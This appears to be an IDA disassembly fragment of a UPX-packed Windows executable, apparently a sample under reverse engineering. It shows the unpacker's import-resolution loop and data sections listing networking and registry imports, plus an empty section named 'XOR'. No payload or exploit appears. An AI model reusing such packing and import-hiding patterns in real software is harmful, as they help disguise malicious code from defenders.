lea edi, [esi+6000h]
loc_3120830C: ; CODE XREF: UPX1:3120832E�j
mov eax, [edi]
or eax, eax
jz short loc_31208357
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+808Ch]
xchg eax, ebp
loc_31208329: ; CODE XREF: UPX1:3120834F�j
mov al, [edi]
inc edi
or al, al
jz short loc_3120830C
mov ecx, edi
jns short near ptr loc_3120833A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_3120833A: ; CODE XREF: UPX1:31208332�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+8090h]
or eax, eax
jz short loc_31208351
mov [ebx], eax
add ebx, 4
jmp short loc_31208329
; ---------------------------------------------------------------------------
loc_31208351: ; CODE XREF: UPX1:31208348�j
call dword ptr [esi+8094h]
loc_31208357: ; CODE XREF: UPX1:31208310�j
popa
jmp loc_31202DE8
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 31209000h
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C1BF18h, 0
aNia db '¨A~',0
align 4
aBB db '¡ÈÂB',0
align 4
aKblq db 'ŠB«q',0
align 4
aKernel32_dll db 'KERNEL32.DLL',0
aAdvapi32_dll db 'ADVAPI32.dll',0
aMsvcrt_dll db 'MSVCRT.dll',0
aUser32_dll db 'USER32.dll',0
aWininet_dll db 'WININET.dll',0
aWs2_32_dll db 'WS2_32.dll',0
align 4
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddress db 'GetProcAddress',0
align 2
aExitprocess db 'ExitProcess',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 74610000h, 696Fh, 72707377h, 66746E69h, 41h, 65746E49h
dd 74656E72h, 6E65704Fh, 41h, 3A6h dup(0)
UPX2 ends
; Section 4. (virtual address 0000A000)
; Virtual size : 00000800 ( 2048.)
; Section size in file : 00000800 ( 2048.)
; Offset to raw data for section: 0000A000
; Flags C0000060: Text Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
XOR segment para public 'DATA' use32
assume cs:XOR
;org 3120A000h
dd 200h dup(0)
XOR ends
; Section 5. (virtual address 0000B000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000A800
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 3120B000h
align 2000h
_idata2 ends
end start